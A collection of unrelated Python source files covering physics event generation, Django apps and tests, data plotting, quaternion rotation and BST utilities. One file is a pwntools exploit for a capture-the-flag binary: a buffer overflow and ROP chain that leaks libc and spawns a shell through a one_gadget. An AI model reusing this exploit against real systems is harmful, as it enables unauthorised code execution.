argParser.add_argument('--overwrite', action='store_true', help="Overwrite exisiting x-sec calculation and gridpack")
argParser.add_argument('--keepWorkspace', action='store_true', help="keep the temporary workspace?")
argParser.add_argument('--nEvents', action='store', default = 50000, type=int, help="Number of Events" )
argParser.add_argument('--logLevel', action='store', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'], default='INFO', help="Log level for logging" )
argParser.add_argument('--makeGridpack',action='store_true', help="make gridPack?" )
argParser.add_argument('--calcXSec', action='store_true', help="calculate x-sec?" )
args = argParser.parse_args()
# Rebinds the imported module name ``logger`` to the configured logger instance.
logger = logger.get_logger(args.logLevel, logFile = None)
logger.debug("Coupling arguments: %r", args.couplings )
# Single argument -> interpret as file
# One existing file path: each line of the file is a parameter point
# (alternating coupling names and values).
if len(args.couplings) == 1 and os.path.isfile(args.couplings[0]) :
    with open(args.couplings[0], 'r') as f:
        param_points = [ line.rstrip().split() for line in f.readlines() ]
# Interpret couplings
#elif len(args.couplings)>=2:
elif len(args.couplings)==0 or len(args.couplings)>=2:
    # make a list of the form [ ['c1', v1, v2, ...], ['c2', ...] ] so we can recurse in the couplings c1,c2,...
    coupling_list = []
    for a in args.couplings:
        try:
            val = float(a)
        except ValueError:
            # Non-numeric token starts a new coupling with an empty value list.
            coupling_list.append( [ a, [] ] )
            val = None
        if val is not None: coupling_list[-1][1].append( float(a) )
    # recursively make a for loop over all couplings
    # Builds the cartesian product of all coupling value lists as flat
    # (name, value, name, value, ...) tuples.
    def recurse( c_list ):
        var, vals = c_list[-1]
        pairs = [ (var, val) for val in vals ]
        if len(c_list)>1:
            rec = recurse(c_list[:-1])
            return [ r + p for p in pairs for r in rec]
        else:
            return pairs
    # No couplings at all means a single Standard-Model-like point: [[]].
    param_points = recurse( coupling_list ) if len(coupling_list)>0 else [[]]
else:
    logger.error("Need an even number of coupling arguments of the format coupling1, value1, value2, ... , coupling2, value3, ... . Got %r", args.couplings )
    raise ValueError
# Create configuration class
config = Configuration( model_name = args.model )
# Process all the coupling points
for i_param_point, param_point in enumerate(param_points):
    logger.info( "Processing parameter point %i/%i", i_param_point+1, len(param_points) )
    # Interpret coupling argument list
    # Even positions are names, odd positions their values.
    names = param_point[::2]
    values = map(float,param_point[1::2])
    modification_dict = {c:v for c,v in zip( names, values ) }
    # Let's not leave the user in the dark
    logger.info("Model: %s", args.model)
    logger.info("Process: %s", args.process)
    logger.info("Couplings: %s", ", ".join( [ "%s=%5.4f" % c for c in modification_dict.items()] ))
    # make process
    p = Process(process = args.process, nEvents = args.nEvents, config = config)
    # Make grid pack
    if args.makeGridpack:
        gridpack = p.makeGridpack(modified_couplings = modification_dict, overwrite = args.overwrite)
    # calculate x-sec
    if args.calcXSec:
        xsec = p.xsec(modified_couplings = modification_dict, overwrite = args.overwrite)
        logger.info("xsec: %s ", repr(xsec) )
# Remove the temporary workspace unless the user asked to keep it.
if not args.keepWorkspace: config.cleanup()
|
# v4
# use class decorator
# works ok
from inspect import Parameter, Signature
def make_signature(names):
    """Build an inspect.Signature of positional-or-keyword parameters
    named after *names*, in order."""
    params = [Parameter(n, Parameter.POSITIONAL_OR_KEYWORD) for n in names]
    return Signature(params)
def sig_deco(*names):
    """Class decorator attaching a ``__signature__`` whose parameters are
    *names* (all positional-or-keyword)."""
    def decorate(cls):
        # ``cls`` is the decorated class itself (e.g. Stock below).
        params = [Parameter(n, Parameter.POSITIONAL_OR_KEYWORD) for n in names]
        cls.__signature__ = Signature(params)
        return cls
    return decorate
class Structure:
    """Base class whose __init__ binds its arguments against the class's
    ``__signature__`` and stores each bound value as an attribute."""

    __signature__ = Signature()  # default: no parameters accepted

    def __init__(self, *args, **kwargs):
        bound_args = self.__signature__.bind(*args, **kwargs)
        for name, value in bound_args.arguments.items():
            setattr(self, name, value)
# Concrete record types: the decorator supplies the constructor signature,
# Structure.__init__ does the field assignment.
@sig_deco("name", "shares", "price")
class Stock(Structure):
    pass

@sig_deco("hostname", "port")
class Address(Structure):
    pass
|
# Report whether ``a`` is prime by trial division.
a = 7
# Fix: the original iterated over the TUPLE (2, a-1) -- only two candidate
# divisors -- and printed a verdict on every iteration, so it could print
# both messages and miss real divisors.
is_prime = a > 1 and all(a % i != 0 for i in range(2, a))
if is_prime:
    print(" The given number ", a, "is prime")
else:
    print(" The given number ", a, " is not prime")
|
class PaymentError(Exception):
    """Common root for all payment errors, so callers can catch every
    payment failure with a single except clause.  All existing classes
    remain Exception subclasses, so existing handlers keep working."""


class InvalidCardDetailsError(PaymentError):
    """Raised when card details are not valid."""


class PaymentFailed(PaymentError):
    """Raised when a transaction fails."""


class PaymentGatewayNotAvailableError(PaymentError):
    """Raised when the payment gateway is not available."""


class InvalidAmountError(PaymentError):
    """Raised when the amount is not valid."""
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Exceptions related to `chzip`"""


class DownloadException(Exception):
    """Exception raised when a problem occurred while downloading a file."""


class UpgradeException(Exception):
    """Exception raised to signal a failure in the upgrade process."""
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 26 11:40:52 2018
@author: pmarella

Exploratory plots over a TestRail export: test-run distribution pie chart
and per-run pass/fail bar charts.
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

data = pd.read_csv("Testrail_data.csv")
# Row subsets by defect link and by execution status.
test_without_defect = data.loc[data["TC-Defect"].isnull()]
test_with_defect = data.loc[data["TC-Defect"].notna()]
test_failed = data.loc[data["Status"] == "Failed"]
test_passed = data.loc[data["Status"] == "Passed"]
test_blocked = data.loc[data["Status"] == "Blocked"]
#print(test_blocked)
#print(data["Test-Case"].value_counts())
#print(data["Test-Run"].value_counts())
# pie chart for job
plt.pie(data["Test-Run"].value_counts().values, autopct='%1.2f%%', labels=data["Test-Run"].value_counts().keys())
plt.title("Pie chart of Test-Run")
plt.show()
# Status counts per test run (rows: run, columns: status).
test_run_status = data.groupby(["Test-Run", "Status"]).size().unstack(fill_value=0)
print(test_run_status)
width=0.4
p1 = plt.bar(test_run_status["Passed"].keys(), test_run_status["Passed"].values)
p2 = plt.bar(test_run_status["Failed"].keys(), test_run_status["Failed"].values, width)
plt.yticks(np.arange(0,300,25))
plt.legend((p1, p2), ("Passed", "Failed"))
plt.show()
# FIXME(review): ``test_run_status[""]`` selects a column named "" which the
# groupby/unstack above does not produce -- as written this raises KeyError.
# Presumably a row filter was intended; confirm before relying on code below.
test_run_status = test_run_status.loc[test_run_status[""]]
print(test_run_status)
width=0.4
p1 = plt.bar(test_run_status["Passed"].keys(), test_run_status["Passed"].values)
p2 = plt.bar(test_run_status["Failed"].keys(), test_run_status["Failed"].values, width)
plt.yticks(np.arange(0,300,25))
plt.legend((p1, p2), ("Passed", "Failed"))
plt.show()
import models.model as model
def main():
    """
    Count the number of earthquakes in the regions of: EastJapan, Kanto,
    Kansai, Tohoku with mag>3.0 or mag>5.0.

    Refactored: the original hand-duplicated the load/print sequence for
    every region and magnitude; the loops below emit the exact same output
    in the exact same order.
    """
    regions = ("EastJapan", "Kanto", "Kansai", "Tohoku")
    for magnitude in ("3.0", "5.0"):
        year = 2006
        for offset in range(5):
            print(year + offset)
            for region in regions:
                # File naming scheme: <magnitude><region>real<year>.txt
                loaded = model.loadModelFromFile(
                    "../Zona/" + magnitude + region + "real" + str(year + offset) + ".txt")
                print(region)
                print(sum(loaded.bins))


if __name__ == "__main__":
    main()
|
from django.shortcuts import render
# Create your views here.
from list_strings.forms import ListStringsForm
from list_strings.utils import longest_substring
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
def home(request):
    """Render the index page; on a valid POST, compute the longest common
    substring of the submitted strings (one per line) and show it."""
    res = ''
    if request.method == 'POST':
        form = ListStringsForm(request.POST)
        if form.is_valid():
            data = form.cleaned_data['strings']
            # One input string per line of the textarea.
            data = data.strip().split("\n")
            res = longest_substring(data)
    else:
        form = ListStringsForm()
    dd = {
        'form': form,
        'res': res,
    }
    return render(request, 'list_strings/index.html', dd)
class LongestStringRESTView(APIView):
    """REST endpoint around ``longest_substring``: the input list arrives as
    newline-separated text in the ``data`` parameter of GET or POST."""

    def _process(self, data):
        # Shared GET/POST implementation: split lines and delegate.
        print("**** data {}".format(data))
        data = data.strip().split("\n")
        res = longest_substring(data)
        return res

    def post(self, request, *args, **kw):
        print("request.POST {}".format(request.POST))
        result = self._process(request.POST.get('data', ''))
        result = {'result': result}
        response = Response(result, status=status.HTTP_200_OK)
        return response

    def get(self, request, *args, **kw):
        print("request.GET {}".format(request.GET))
        # Process any get params that you may need
        # If you don't need to process get params,
        # you can skip this part
        result = self._process(request.GET.get('data', ''))
        result = {'result': result}
        response = Response(result, status=status.HTTP_200_OK)
        return response
|
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
# NOTE(review): context says i386 but the payloads below use p64 and 64-bit
# gadget addresses -- arch should presumably be amd64; confirm.
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./mousetrap"
HOST = "cha.hackpack.club"
PORT = 41719
# 'r' on the command line targets the remote service, default is local.
if len(sys.argv) > 1 and sys.argv[1] == 'r':
    conn = remote(HOST, PORT)
else:
    conn = process(FILE_NAME)
elf = ELF(FILE_NAME)
addr_main = elf.symbols["main"]
rdi_ret = 0x400923  # gadget address in the binary (pop rdi; ret -- TODO confirm)
plt_puts = elf.plt["puts"]
got_puts = elf.got["puts"]
got_read = elf.got["read"]
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
#
libc = ELF('./libc.so')
off_read = libc.symbols["read"]
gadget = [0x4f2c5, 0x4f322, 0x10a38c]  # candidate one_gadget offsets in libc
def exploit():
    """Two-stage attack: leak libc via puts(got_read), return to main, then
    overwrite the saved return address with a one_gadget in libc."""
    # loop1
    # Stage 1: overflow the 'Name' buffer to enlarge the next read's size.
    payload = "A"*(0x20-0x8)
    payload += p64(0x200)
    conn.sendafter("Name: ", payload)
    # Pad up to the saved return address, then chain: puts(got_read) leaks
    # the runtime address of read, and main restarts for stage 2.
    payload = "\x00"*(0x120+8)
    #payload += p64(rdi_ret)
    #payload += p64(got_puts)
    #payload += p64(plt_puts)
    payload += p64(rdi_ret)
    payload += p64(got_read)
    payload += p64(plt_puts)
    payload += p64(addr_main)
    conn.sendlineafter(": ", payload)
    conn.recvuntil("died!")
    #libc_puts = u64(conn.recv(6)+"\x00\x00")
    #conn.recvline()
    #print hex(libc_puts)
    # 6 leaked bytes zero-extended to a 64-bit address.
    libc_read = u64(conn.recv(6)+"\x00\x00")
    libc_base = libc_read - off_read
    one_gadget = libc_base + gadget[0]
    print hex(libc_base)
    # Stage 2: same overflow, return straight into the one_gadget shell.
    payload = "A"*(0x20-0x8)
    payload += p64(0x200)
    conn.sendafter("Name: ", payload)
    payload = "\x00"*(0x120+8)
    payload += p64(one_gadget)
    conn.sendlineafter(": ", payload)
    conn.interactive()
if __name__ == "__main__":
    exploit()
|
# Step: interface definition for a pipeline step.
from abc import ABC, abstractmethod  # Abstract Base Class


class Step(ABC):  # Base class
    """Abstract interface: a concrete step implements ``process``."""

    def __init__(self):
        pass

    @abstractmethod
    def process(self, transporter, inputs, utils):  # execute this step
        pass
class StepException(Exception):  # exception type for step failures
    """Raised when a Step fails during processing."""
    pass
|
from math import tanh
from mlpnn.Abstracts.Function import Function
class HyperbolicTangent(Function):
    """Hyperbolic-tangent activation for the MLP framework.

    ``function`` returns f(x, beta) = tanh(beta * x).  ``derivative``
    returns 1 - x*x; presumably its argument is the activation OUTPUT,
    since tanh'(z) = 1 - tanh(z)**2 -- confirm against callers.
    """

    def function(self):
        # Closure matching the Function interface: caller supplies x and beta.
        return lambda x, beta: tanh(beta * x)

    def derivative(self):
        return lambda x: 1 - x * x
|
from datetime import date
from django.contrib.auth.models import User
from django.test import TestCase, Client
from planner.models import Garden, Vegetable, Bed, CultivatedArea, ForthcomingOperation, COWithDate, History
class AlertsViewsTests(TestCase):
    """Integration tests for the garden alerts views: listing, adding a
    seeding, validating, postponing, deleting and printing operations."""

    def setUp(self):
        # One garden owned by a known user, with a vegetable, a bed and a
        # single pending operation (self.alert) for each test to act on.
        self.client = Client()
        self.username = 'test_user'
        self.email = 'test@whatever.com'
        self.password = 'test'
        self.user = User.objects.create_user(self.username, self.email, self.password)
        self.garden = Garden.objects.create(name="MyGarden", postal_code=1000)
        History.objects.create(garden=self.garden)
        self.garden.users.add(self.user)
        self.vegetable = Vegetable.objects.create(name="Tomato", variety="Yellow Pearshaped", garden=self.garden)
        self.surface = Bed.objects.create(name="Bedding", garden=self.garden, width=250, length=250)
        operation = COWithDate.objects.create(name="Work", vegetable=self.vegetable, absoluteDate=date(2018, 8, 3))
        area = CultivatedArea.objects.create(vegetable=self.vegetable, garden=self.garden, label="Tomato area",
                                             surface=self.surface)
        self.alert = ForthcomingOperation.objects.create(area_concerned=area, original_cultural_operation=operation)

    def test_alert_view_index(self):
        # Anonymous access redirects to login; authenticated access renders.
        response = self.client.get('/{}/alerts'.format(self.garden.id))
        self.assertRedirects(response, expected_url='/login/?next=/{}/alerts'.format(self.garden.id), status_code=302)
        self.client.login(username=self.username, password=self.password)
        response = self.client.get('/{}/alerts'.format(self.garden.id))
        self.assertEqual(response.status_code, 200)

    def test_add_seed(self):
        # Posting the add_seed form creates a new CultivatedArea.
        self.client.login(username=self.username, password=self.password)
        response = self.client.get('/{}/alerts/add_seed'.format(self.garden.id))
        self.assertEqual(response.status_code, 200)
        form = {'vegetable_selection': self.vegetable.id, "seeding_label": "My seeding",
                "surface_selection": self.surface.id}
        self.assertEqual(len(CultivatedArea.objects.filter(label="My seeding")), 0)
        response = self.client.post('/{}/alerts/add_seed'.format(self.garden.id), form)
        self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
        self.assertEqual(len(CultivatedArea.objects.filter(label="My seeding")), 1)

    def test_validate_alert(self):
        # Validating marks the alert done and records the execution date.
        self.client.login(username=self.username, password=self.password)
        response = self.client.get('/{}/alerts/{}/validate'.format(self.garden.id, self.alert.id))
        self.assertEqual(response.status_code, 200)
        form = {'execution_date': '2018-04-04', 'duration': '00:15:15', 'validation_note': ""}
        response = self.client.post('/{}/alerts/{}/validate'.format(self.garden.id, self.alert.id), form)
        self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
        self.assertTrue(ForthcomingOperation.objects.get(pk=self.alert.id).is_done)
        self.assertEqual(ForthcomingOperation.objects.get(pk=self.alert.id).execution_date, date(2018, 4, 4))

    def test_postpone_alert(self):
        # Postponing stores the requested delay (in days) on the alert.
        self.client.login(username=self.username, password=self.password)
        response = self.client.get('/{}/alerts/{}/postpone'.format(self.garden.id, self.alert.id))
        self.assertEqual(response.status_code, 200)
        form = {'postponement_in_days': "5"}
        response = self.client.post('/{}/alerts/{}/postpone'.format(self.garden.id, self.alert.id), form)
        self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
        self.assertEqual(ForthcomingOperation.objects.get(pk=self.alert.id).postponement, 5)

    def test_delete_useless_alert(self):
        # Deleting with justification closes the alert and logs one history item.
        self.client.login(username=self.username, password=self.password)
        response = self.client.get('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(self.garden.history.historyitem_set.count(), 0)
        form = {'deletion_justification': "useless", "note": ""}
        response = self.client.post('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id), form)
        self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
        self.assertTrue(ForthcomingOperation.objects.get(pk=self.alert.id).is_done)
        self.assertEqual(self.garden.history.historyitem_set.count(), 1)

    def test_delete_destruction_alert(self):
        # Same flow as above with the "destruction" justification.
        self.client.login(username=self.username, password=self.password)
        response = self.client.get('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(self.garden.history.historyitem_set.count(), 0)
        form = {'deletion_justification': "destruction", "note": ""}
        response = self.client.post('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id), form)
        self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
        self.assertTrue(ForthcomingOperation.objects.get(pk=self.alert.id).is_done)
        self.assertEqual(self.garden.history.historyitem_set.count(), 1)

    def test_print_forthcoming_operations(self):
        # The print view renders; the POST path is disabled on CI (latex pdf).
        self.client.login(username=self.username, password=self.password)
        response = self.client.get('/{}/alerts/print'.format(self.garden.id))
        self.assertEqual(response.status_code, 200)
        # Commented because Travis does not seem to be able to generate latex pdf
        # form = {'delay_to_print': "8"}
        # response = self.client.post('/{}/alerts/print'.format(self.garden.id), form)
        # self.assertEqual(response.status_code, 200)
|
"""
E160_gui.py
"""
import sys
from E160_config import CONFIG_DELTA_T
import time
from E160_environment import *
from E160_graphics import *
def main():
    """Run the E160 robot simulation/GUI loop until the window is closed."""
    # instantiate robot navigation classes
    environment = E160_environment()
    graphics = E160_graphics(environment)
    # set time step size in seconds
    deltaT = CONFIG_DELTA_T
    first_tick = True
    # loop over time
    while True:
        # update graphics, but stop the thread if user stopped the gui
        if not graphics.update():
            break
        if first_tick:
            # Block until the user presses Enter before the first step.
            input()
            first_tick = False
        # update robots
        environment.update_robots(deltaT)
        # log all the robot data
        environment.log_data()
        # maintain timing
        time.sleep(deltaT)


if __name__ == "__main__":
    main()
|
import math
class Quaternion:
    """Minimal quaternion supporting rotation of 3-D position vectors."""

    def __init__(self, axis=None, angle=None, position=None, quat=None):
        """Build a quaternion from one of several representations.

        axis+angle : rotation quaternion (axis 3-vector, angle in radians)
        position   : pure quaternion (real part 0) encoding a 3-D point
        quat       : raw [r, i, j, k] components
        (none)     : zero quaternion
        """
        if axis is not None and angle is not None:
            # BUG FIX: the original tested ``if axis and angle``, so a
            # perfectly valid angle of 0.0 was treated as "not given" and
            # fell through to the wrong branch.
            theta = angle / 2.0
            sin_t = math.sin(theta)
            self.r = math.cos(theta)
            self.i = [axis[0] * sin_t, axis[1] * sin_t, axis[2] * sin_t]
        elif position is not None:
            self.r = 0.0
            self.i = [position[0], position[1], position[2]]
        elif quat is not None:
            self.r = quat[0]
            self.i = [quat[1], quat[2], quat[3]]
        else:
            self.r = 0.0
            self.i = [0.0, 0.0, 0.0]
        # BUG FIX: ``conj`` was only assigned in the axis/angle and default
        # branches; now every quaternion carries its conjugate.
        self.conj = [self.r, -self.i[0], -self.i[1], -self.i[2]]

    def rotatePosition(self, pos):
        """Rotate pure quaternion *pos* by this quaternion (q * pos * q_conj)
        and return the rotated point as an [x, y, z] list."""
        tmp = self.multiply(pos)
        result = tmp.multiply(Quaternion(quat=self.conj))
        return [result.i[0], result.i[1], result.i[2]]

    def multiply(self, other):
        """Return the Hamilton product self * other as a new Quaternion."""
        tmp = Quaternion()
        tmp.r = (self.r * other.r) - (self.i[0] * other.i[0]) - (self.i[1] * other.i[1]) - (self.i[2] * other.i[2])
        tmp.i[0] = (self.r * other.i[0]) + (self.i[0] * other.r) + (self.i[1] * other.i[2]) - (self.i[2] * other.i[1])
        tmp.i[1] = (self.r * other.i[1]) - (self.i[0] * other.i[2]) + (self.i[1] * other.r) + (self.i[2] * other.i[0])
        tmp.i[2] = (self.r * other.i[2]) + (self.i[0] * other.i[1]) - (self.i[1] * other.i[0]) + (self.i[2] * other.r)
        return tmp
def main():
    """Rotate every atom of data/1lyd.pdb by 30 degrees about the unit axis
    (0, 2, 1)/sqrt(5) and write the result to data/1lyd_rotated.pdb."""
    # Get relevant coordinates from Pdb file
    coordinates = getCoordinatesPdbFile('data/1lyd.pdb')
    rotatedCoordinates = []
    my_axis = [0, 2 / math.sqrt(5), 1 / math.sqrt(5)]  # unit-length axis
    my_angle = 30.0
    my_angle = math.radians(my_angle)  # Quaternion expects radians
    my_quat = Quaternion(axis=my_axis, angle=my_angle)
    # Rotate coordinates
    for i in range(len(coordinates)):
        rotated_vector = my_quat.rotatePosition(Quaternion(position=coordinates[i]))
        rotatedCoordinates.append(rotated_vector)
    # Store coordinates back in Pdb file
    setCoordinatesPdbFile('data/1lyd.pdb', 'data/1lyd_rotated.pdb', rotatedCoordinates)
def setCoordinatesPdbFile(file_to_read, file_to_write, rotatedCoordinates):
    """Copy *file_to_read* to *file_to_write*, substituting the i-th entry
    of *rotatedCoordinates* for the coordinates of the i-th ATOM/HETATM
    record; every other record is copied through unchanged.

    The format string rebuilds the fixed-width PDB record layout from the
    original line's column slices plus the three new float coordinates.
    NOTE(review): a blank line would raise IndexError at ``line.split()[0]``
    -- confirm inputs are well-formed PDB files.
    """
    with open(file_to_read) as f:
        list_ = list(f)
    i = 0  # index into rotatedCoordinates, advanced once per atom record
    with open(file_to_write, 'w') as output:
        for line in list_:
            id_ = line.split()[0]
            if id_ == 'ATOM' or id_ == 'HETATM':
                output.write("{:6s}{:5s} {:^4s}{:1s}{:3s} {:1s}{:4s}{:1s} {:8.3f}{:8.3f}{:8.3f}{:6.2s}{:6.2s} {:>2s}{:2s}\n".format(
                    line[0:6], line[6:11], line[12:16], line[16:17], line[17:20], line[21:22], line[22:26], line[26:27],
                    rotatedCoordinates[i][0], rotatedCoordinates[i][1], rotatedCoordinates[i][2], line[54:60],
                    line[60:66], line[76:78], line[78:80]))
                i += 1
            else:
                output.write(line)
def getCoordinatesPdbFile(fileName):
    """Return [x, y, z] float triples for every ATOM/HETATM record in
    *fileName*, in file order.

    Fixes: the file handle is now closed deterministically (the original
    iterated an anonymous ``open()``), and blank lines no longer raise
    IndexError.
    """
    coordinateList = []
    with open(fileName) as handle:
        for line in handle:
            fields = line.split()
            if not fields:
                continue  # skip blank lines (the original crashed here)
            if fields[0] == 'ATOM' or fields[0] == 'HETATM':
                coordinateList.append([float(fields[6]), float(fields[7]), float(fields[8])])
    return coordinateList
# Press the green button in the gutter to run the script.
# Script entry point: rotates the sample PDB file (see main above).
if __name__ == '__main__':
    main()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
# coding: utf-8
import random
import string
import hashlib
import base64
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.db import models
class UserAuthCode(object):
    """Salted hash used as an account-activation code for new users.

    NOTE(review): Python 2 only as written -- ``string.letters``, ``xrange``
    and hashing a ``str`` all break on Python 3 (needs ``ascii_letters``,
    ``range`` and explicit ``.encode()``).
    """
    def __init__(self, secret, salt_len=8, hash=hashlib.sha256):
        self.secret = secret      # site-wide secret (e.g. settings.SECRET_KEY)
        self.salt_len = salt_len  # number of leading salt characters in a code
        self.hash = hash          # hash constructor
    def salt(self):
        # Random alphanumeric salt of fixed length.
        s = [random.choice(string.letters + string.digits)
             for i in xrange(self.salt_len)]
        return "".join(s)
    def digest(self, user, salt):
        # Use username, email and date_joined to generate digest
        auth_message = ''.join((self.secret, user.username, user.email,
                                str(user.date_joined), salt))
        md = self.hash()
        md.update(auth_message)
        # URL-safe base64 digest with '=' padding stripped.
        return base64.urlsafe_b64encode(md.digest()).rstrip('=')
    def auth_code(self, user):
        # Code layout: <salt><digest>; is_valid splits it at salt_len.
        salt = self.salt()
        digest = self.digest(user, salt)
        return "%s%s" % (salt, digest)
    def is_valid(self, user, auth_code):
        #import pdb; pdb.set_trace()
        salt = auth_code[:self.salt_len]
        digest = auth_code[self.salt_len:]
        # CAVEAT: Make sure UserAuthCode cannot be used to reactivate locked
        # profiles.
        if user.last_login >= user.date_joined:
            return False
        return digest == self.digest(user, salt)
class Profile(models.Model):
    ''' User profile: optional demographic data attached one-to-one to a
    Django auth User.'''
    # Enumeration stored in the ``sex`` SmallIntegerField below.
    SEX_UNKNOWN = 0
    SEX_MALE = 1
    SEX_FEMALE = 2
    SEX_CHOICES = (
        (SEX_UNKNOWN, _("unknown")),
        (SEX_MALE, _("male")),
        (SEX_FEMALE, _('female'))
    )
    user = models.OneToOneField(User)
    sex = models.SmallIntegerField(
        blank=True, null=True,
        choices=SEX_CHOICES,
        verbose_name=_('sex'))
    date_of_birth = models.DateField(
        blank=True, null=True, verbose_name=_('date of birth'))
def activate_user(user, code):
    """Activate *user* when *code* is a valid auth code for that account.

    Returns True when the account was activated and saved, False when the
    code was rejected.
    """
    encoder = UserAuthCode(settings.SECRET_KEY)
    if not encoder.is_valid(user, code):
        return False
    user.is_active = True
    user.save()
    return True
def create_new_user(username, password, first_name, last_name, email):
    """Create, persist and return an active non-staff ``User``.

    The password is hashed via ``set_password`` before saving.
    """
    new_user = User(
        username=username,
        first_name=first_name,
        last_name=last_name,
        email=email,
        is_staff=False,
        is_active=True,
    )
    new_user.set_password(password)
    new_user.save()
    return new_user
|
from onegov.core.security import Personal
from onegov.feriennet import FeriennetApp
from onegov.feriennet.forms import UserProfileForm
from onegov.org.models import Organisation
from onegov.org.views.userprofile import handle_user_profile
@FeriennetApp.form(
    model=Organisation, name='userprofile', template='userprofile.pt',
    permission=Personal, form=UserProfileForm)
def handle_custom_user_profile(self, request, form):
    """Feriennet 'userprofile' view: delegate to the stock onegov.org
    user-profile handler, supplying the Feriennet form class."""
    return handle_user_profile(self, request, form)
|
import unittest
from tree_utils import NodeWithParent
def suscessor(node):
    """Return the in-order successor of *node* in a BST, or None.

    Two cases:
    * node has a right subtree -> the leftmost node of that subtree;
    * otherwise -> the nearest ancestor for which *node* lies in the
      left subtree; None when no such ancestor exists (node is the
      maximum, or *node* itself is None).
    """
    if node is None:
        return None
    if node.right:
        successor = node.right
        while successor.left:
            successor = successor.left
        return successor
    ancestor = node.parent
    while ancestor and not (ancestor.left == node):
        node = ancestor
        ancestor = node.parent
    return ancestor
class SuccessorTest(unittest.TestCase):
    """Unit tests for ``suscessor`` over a small hand-built tree."""

    def setUp(self):
        # Assuming NodeWithParent(data, left, right), the tree is:
        #       3
        #      / \
        #     0   4
        #      \
        #       2
        #      /
        #     1
        nwp = NodeWithParent
        self.root = nwp(3,
                        nwp(0,
                            None,
                            nwp(2, nwp(1))),
                        nwp(4))

    def test_successor_none(self):
        # None input, and the tree maximum (4), both have no successor.
        self.assertEqual(suscessor(None), None)
        self.assertEqual(suscessor(self.root.right), None)

    def test_successor_right(self):
        # Successor via the right subtree (leftmost descendant).
        self.assertEqual(suscessor(self.root).data, 4)
        self.assertEqual(suscessor(self.root.left).data, 1)

    def test_successor_parent(self):
        # Successor found by walking up the parent chain.
        # NOTE(review): the first assertion duplicates one from
        # test_successor_right.
        self.assertEqual(suscessor(self.root.left).data, 1)
        self.assertEqual(suscessor(self.root.left.right).data, 3)
if __name__ == '__main__':
    # Run the SuccessorTest suite when executed directly.
    unittest.main()
|
# coding=utf-8
import os
import sys
import time
from datetime import datetime, timedelta
import django

# Hard-coded project locations on the development machine (Windows paths).
prjPath = r'E:\GitHub\myapp\net\website\django\mysite1'
dataPath = r'D:\data'
#from net.website.django.mysite1.myapp.rules import Submarket
sys.path.append( prjPath )
# Boot Django so the ORM models below can be used from this standalone script.
django.setup()
import sqlite3 as db
#conn = db.connect(r"E:\GitHub\myapp\net\website\django\mysite1\db.sqlite3")
# Open the same SQLite file Django is configured with.
conn = db.connect( django.conf.settings.DATABASES['default']['NAME'] ) #r"D:\data\slowdb\db.sqlite3")
#import mysql as db #connector.paramstyle
#import MySQLdb as db
#conn = db.connect( host='localhost', user='root', passwd='', db='myapp', charset='utf8' )
#from selenium import webdriver
from myapp.rules import Submarket, MapSubmarket2Table # net.website.django.mysite1.
from myapp.models import * #Product_, Product, KDaily, KMin, WatchList, Market, StockInfo, TradeRealTime
def arrangeCsvScan(dir):
    """Walk *dir* and normalise history-CSV file names in place.

    Python 2 only (uses the ``<>`` operator).  Renames files of the form
    ``<a>.<b>.<c>.<d>.<ext>`` to ``<d>.<b>.<c>.csv``.
    """
    import scandir
    for path, subdirs, files in scandir.walk(dir):
        for fn in files:
            # NOTE(review): ``market`` is bound twice in this unpacking --
            # the first field is discarded and the fourth wins.  Looks like
            # a typo for a distinct fourth name; verify against the actual
            # on-disk naming scheme.
            market,submarket,code,market,x = fn.split('.')
            if x<>'csv':
                sys.stdout.write( 'not csv file:' + fn + '\r\n' )
            #submarket = Submarket(market, code)
            os.rename( os.path.join(path,fn), os.path.join(path,market + '.' + submarket + '.' + code + '.' + 'csv') )
def arrangeCsv8Dict(prodDict8Submarket):
    """For each product grouped by submarket, read its history CSV and
    collect the rows newer than the recorded history end.

    NOTE(review): appears unfinished -- ``dateHistEnd`` on the comparison
    line is an undefined (module-level?) name, and the trailing
    ``newAfterHistEnd`` / ``newBeforeHistBegin`` flags are set but never
    used before the function returns.
    """
    for key in prodDict8Submarket.keys():
        # Skip buckets whose submarket could not be resolved.
        if key==None or key == '' or key == 'ERR':
            continue
        market = key[:2]  # submarket keys start with the 2-letter market code
        for prod in prodDict8Submarket[key]:
            csvfn = r'D:\data\histcsv\ths\%s.%s.csv' % (market,prod.code)
            if os.path.isfile(csvfn):
                with open(csvfn) as fp:
                    f = fp.read()
            else:
                continue
            lines = f.split('\n')
            histRec = []
            for ln in lines[1:]:  # skip the CSV header line
                fLst = ln.split(',')
                if len(fLst)<7:
                    continue
                # Assumes rows sorted newest-first: stop at the first date
                # already stored -- TODO confirm the CSV ordering.
                if fLst[0]<=dateHistEnd:
                    break
                #fLst[0] = datetime.strptime(fLst[0], '%Y-%m-%d')
                #for i in range(len(fLst[1:])):
                #    fLst[i+1] = float(fLst[i+1])
                histRec.append( [ int(prod.id) ] + fLst )
            if histRec == []:
                continue
            else:
                newAfterHistEnd = True
            if prod.dateHistEnd == None:
                newBeforeHistBegin = True
    return
def workYesterday(d=None):
    """Return the previous working day of *d* as 'YYYY-MM-DD'.

    Sunday and Monday both map back to the preceding Friday; every other
    day maps to the previous calendar day.  *d* defaults to the current
